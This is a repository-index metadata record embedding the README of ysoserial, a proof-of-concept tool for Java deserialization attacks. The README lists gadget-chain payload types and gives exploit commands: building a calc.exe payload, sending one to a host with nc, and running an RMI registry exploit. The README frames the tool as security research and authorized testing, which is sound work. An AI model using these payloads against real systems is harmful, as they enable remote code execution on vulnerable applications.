{"id":13539762,"url":"https://github.com/frohoff/ysoserial","last_synced_at":"2025-05-14T01:02:17.818Z","repository":{"id":26502958,"uuid":"29955458","full_name":"frohoff/ysoserial","owner":"frohoff","description":"A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.","archived":false,"fork":false,"pushed_at":"2024-03-31T02:47:00.000Z","size":463,"stargazers_count":8110,"open_issues_count":47,"forks_count":1790,"subscribers_count":212,"default_branch":"master","last_synced_at":"2025-04-03T05:07:43.333Z","etag":null,"topics":["deserialization","exploit","gadget","java","javadeser","jvm","poc","serialization","vulnerability"],"latest_commit_sha":null,"homepage":"http://frohoff.github.io/appseccali-marshalling-pickles/","language":"Java","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/frohoff.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE.txt","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2015-01-28T07:13:55.000Z","updated_at":"2025-04-03T05:00:17.000Z","dependencies_parsed_at":"2023-01-16T22:30:28.684Z","dependency_job_id":"d47f50e7-c768-45d3-8a93-77a9f0d058a9","html_url":"https://github.com/frohoff/ysoserial","commit_stats":null,"previous_names":[],"tags_count":10,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/frohoff%2Fysoserial","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/frohoff%2Fysoserial/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/frohoff%2Fysoserial/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/frohoff%2Fysoserial/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/frohoff","download_url":"https://codeload.github.com/frohoff/ysoserial/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":248197351,"owners_count":21063619,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["deserialization","exploit","gadget","java","javadeser","jvm","poc","serialization","vulnerability"],"created_at":"2024-08-01T09:01:31.568Z","updated_at":"2025-04-10T09:48:33.000Z","avatar_url":"https://github.com/frohoff.png","language":"Java","readme":"\n# ysoserial\n\n[![GitHub release](https://img.shields.io/github/downloads/frohoff/ysoserial/latest/total)](https://github.com/frohoff/ysoserial/releases/latest/download/ysoserial-all.jar)\n[![Travis Build Status](https://api.travis-ci.com/frohoff/ysoserial.svg?branch=master)](https://travis-ci.com/github/frohoff/ysoserial)\n[![Appveyor Build status](https://ci.appveyor.com/api/projects/status/a8tbk9blgr3yut4g/branch/master?svg=true)](https://ci.appveyor.com/project/frohoff/ysoserial/branch/master)\n[![JitPack](https://jitpack.io/v/frohoff/ysoserial.svg)](https://jitpack.io/#frohoff/ysoserial)\n\nA proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.\n\n![logo](ysoserial.png)\n\n## Description\n\nOriginally released as part of AppSecCali 2015 Talk\n[\"Marshalling Pickles: how deserializing objects will ruin your day\"](\n        https://frohoff.github.io/appseccali-marshalling-pickles/)\nwith gadget chains for Apache Commons Collections (3.x and 4.x), Spring Beans/Core (4.x), and Groovy (2.3.x).\nLater updated to include additional gadget chains for\n[JRE \u003c= 1.7u21](https://gist.github.com/frohoff/24af7913611f8406eaf3) and several other libraries.\n\n__ysoserial__ is a collection of utilities and property-oriented programming \"gadget chains\" discovered in common java\nlibraries that can, under the right conditions, exploit Java applications performing __unsafe deserialization__ of\nobjects. The main driver program takes a user-specified command and wraps it in the user-specified gadget chain, then\nserializes these objects to stdout. When an application with the required gadgets on the classpath unsafely deserializes\nthis data, the chain will automatically be invoked and cause the command to be executed on the application host.\n\nIt should be noted that the vulnerability lies in the application performing unsafe deserialization and NOT in having\ngadgets on the classpath.\n\n## Disclaimer\n\nThis software has been created purely for the purposes of academic research and\nfor the development of effective defensive techniques, and is not intended to be\nused to attack systems except where explicitly authorized. Project maintainers\nare not responsible or liable for misuse of the software. Use responsibly.\n\n## Usage\n\n```shell\n$  java -jar ysoserial.jar\nY SO SERIAL?\nUsage: java -jar ysoserial.jar [payload] '[command]'\n  Available payload types:\n     Payload             Authors                     Dependencies\n     -------             -------                     ------------\n     AspectJWeaver       @Jang                       aspectjweaver:1.9.2, commons-collections:3.2.2\n     BeanShell1          @pwntester, @cschneider4711 bsh:2.0b5\n     C3P0                @mbechler                   c3p0:0.9.5.2, mchange-commons-java:0.2.11\n     Click1              @artsploit                  click-nodeps:2.3.0, javax.servlet-api:3.1.0\n     Clojure             @JackOfMostTrades           clojure:1.8.0\n     CommonsBeanutils1   @frohoff                    commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2\n     CommonsCollections1 @frohoff                    commons-collections:3.1\n     CommonsCollections2 @frohoff                    commons-collections4:4.0\n     CommonsCollections3 @frohoff                    commons-collections:3.1\n     CommonsCollections4 @frohoff                    commons-collections4:4.0\n     CommonsCollections5 @matthias_kaiser, @jasinner commons-collections:3.1\n     CommonsCollections6 @matthias_kaiser            commons-collections:3.1\n     CommonsCollections7 @scristalli, @hanyrax, @EdoardoVignati commons-collections:3.1\n     FileUpload1         @mbechler                   commons-fileupload:1.3.1, commons-io:2.4\n     Groovy1             @frohoff                    groovy:2.3.9\n     Hibernate1          @mbechler\n     Hibernate2          @mbechler\n     JBossInterceptors1  @matthias_kaiser            javassist:3.12.1.GA, jboss-interceptor-core:2.0.0.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21\n     JRMPClient          @mbechler\n     JRMPListener        @mbechler\n     JSON1               @mbechler                   json-lib:jar:jdk15:2.4, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2, commons-lang:2.6, ezmorph:1.0.6, commons-beanutils:1.9.2, spring-core:4.1.4.RELEASE, commons-collections:3.1\n     JavassistWeld1      @matthias_kaiser            javassist:3.12.1.GA, weld-core:1.1.33.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21\n     Jdk7u21             @frohoff\n     Jython1             @pwntester, @cschneider4711 jython-standalone:2.5.2\n     MozillaRhino1       @matthias_kaiser            js:1.7R2\n     MozillaRhino2       @_tint0                     js:1.7R2\n     Myfaces1            @mbechler\n     Myfaces2            @mbechler\n     ROME                @mbechler                   rome:1.0\n     Spring1             @frohoff                    spring-core:4.1.4.RELEASE, spring-beans:4.1.4.RELEASE\n     Spring2             @mbechler                   spring-core:4.1.4.RELEASE, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2\n     URLDNS              @gebl\n     Vaadin1             @kai_ullrich                vaadin-server:7.7.14, vaadin-shared:7.7.14\n     Wicket1             @jacob-baines               wicket-util:6.23.0, slf4j-api:1.6.4\n```\n\n## Examples\n\n```shell\n$ java -jar ysoserial.jar CommonsCollections1 calc.exe | xxd\n0000000: aced 0005 7372 0032 7375 6e2e 7265 666c  ....sr.2sun.refl\n0000010: 6563 742e 616e 6e6f 7461 7469 6f6e 2e41  ect.annotation.A\n0000020: 6e6e 6f74 6174 696f 6e49 6e76 6f63 6174  nnotationInvocat\n...\n0000550: 7672 0012 6a61 7661 2e6c 616e 672e 4f76  vr..java.lang.Ov\n0000560: 6572 7269 6465 0000 0000 0000 0000 0000  erride..........\n0000570: 0078 7071 007e 003a                      .xpq.~.:\n\n$ java -jar ysoserial.jar Groovy1 calc.exe \u003e groovypayload.bin\n$ nc 10.10.10.10 1099 \u003c groovypayload.bin\n\n$ java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit myhost 1099 CommonsCollections1 calc.exe\n```\n\n## Installation\n\n[![GitHub release](https://img.shields.io/github/downloads/frohoff/ysoserial/latest/total)](https://github.com/frohoff/ysoserial/releases/latest/download/ysoserial-all.jar)\n\nDownload the [latest release jar](https://github.com/frohoff/ysoserial/releases/latest/download/ysoserial-all.jar) from GitHub releases.\n\n## Building\n\nRequires Java 1.7+ and Maven 3.x+\n\n```mvn clean package -DskipTests```\n\n## Code Status\n\n[![Build Status](https://api.travis-ci.com/frohoff/ysoserial.svg?branch=master)](https://travis-ci.com/github/frohoff/ysoserial)\n[![Build status](https://ci.appveyor.com/api/projects/status/a8tbk9blgr3yut4g/branch/master?svg=true)](https://ci.appveyor.com/project/frohoff/ysoserial/branch/master)\n\n## Contributing\n\n1. Fork it\n2. Create your feature branch (`git checkout -b my-new-feature`)\n3. Commit your changes (`git commit -am 'Add some feature'`)\n4. Push to the branch (`git push origin my-new-feature`)\n5. Create new Pull Request\n\n## See Also\n* [Java-Deserialization-Cheat-Sheet](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet): info on vulnerabilities, tools, blogs/write-ups, etc.\n* [marshalsec](https://github.com/frohoff/marshalsec): similar project for various Java deserialization formats/libraries\n* [ysoserial.net](https://github.com/pwntester/ysoserial.net): similar project for .NET deserialization\n","funding_links":[],"categories":["Exploitation","Weapons","Java","Java (504)","\u003ca id=\"1233584261c0cd5224b6e90a98cc9a94\"\u003e\u003c/a\u003e渗透\u0026\u0026offensive\u0026\u0026渗透框架\u0026\u0026后渗透框架","\u003ca id=\"783f861b9f822127dba99acb55687cbb\"\u003e\u003c/a\u003e工具","Pentesting","Web","Bugs"],"sub_categories":["Insecure Deserialization","Tools","\u003ca id=\"80301821d0f5d8ec2dd3754ebb1b4b10\"\u003e\u003c/a\u003ePayload\u0026\u0026远控\u0026\u0026RAT","\u003ca id=\"ad92f6b801a18934f1971e2512f5ae4f\"\u003e\u003c/a\u003ePayload生成","Payloads","Deserialization"],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Ffrohoff%2Fysoserial","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Ffrohoff%2Fysoserial","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Ffrohoff%2Fysoserial/lists"}